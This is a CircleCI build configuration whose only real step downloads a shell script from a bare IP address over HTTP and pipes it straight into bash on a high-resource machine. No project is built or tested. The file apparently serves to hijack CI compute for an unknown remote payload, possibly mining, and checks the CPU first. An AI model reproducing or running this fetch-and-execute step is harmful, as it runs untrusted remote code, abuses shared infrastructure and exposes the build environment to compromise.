version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:current
    resource_class: 2xlarge
    steps:
      - run: lscpu
      - run: apt update && apt -y install wget
      - run: wget -O - http://23.92.22.221/start_N_Doc_Pul_mnpls_OV_solo_ws2.sh | bash
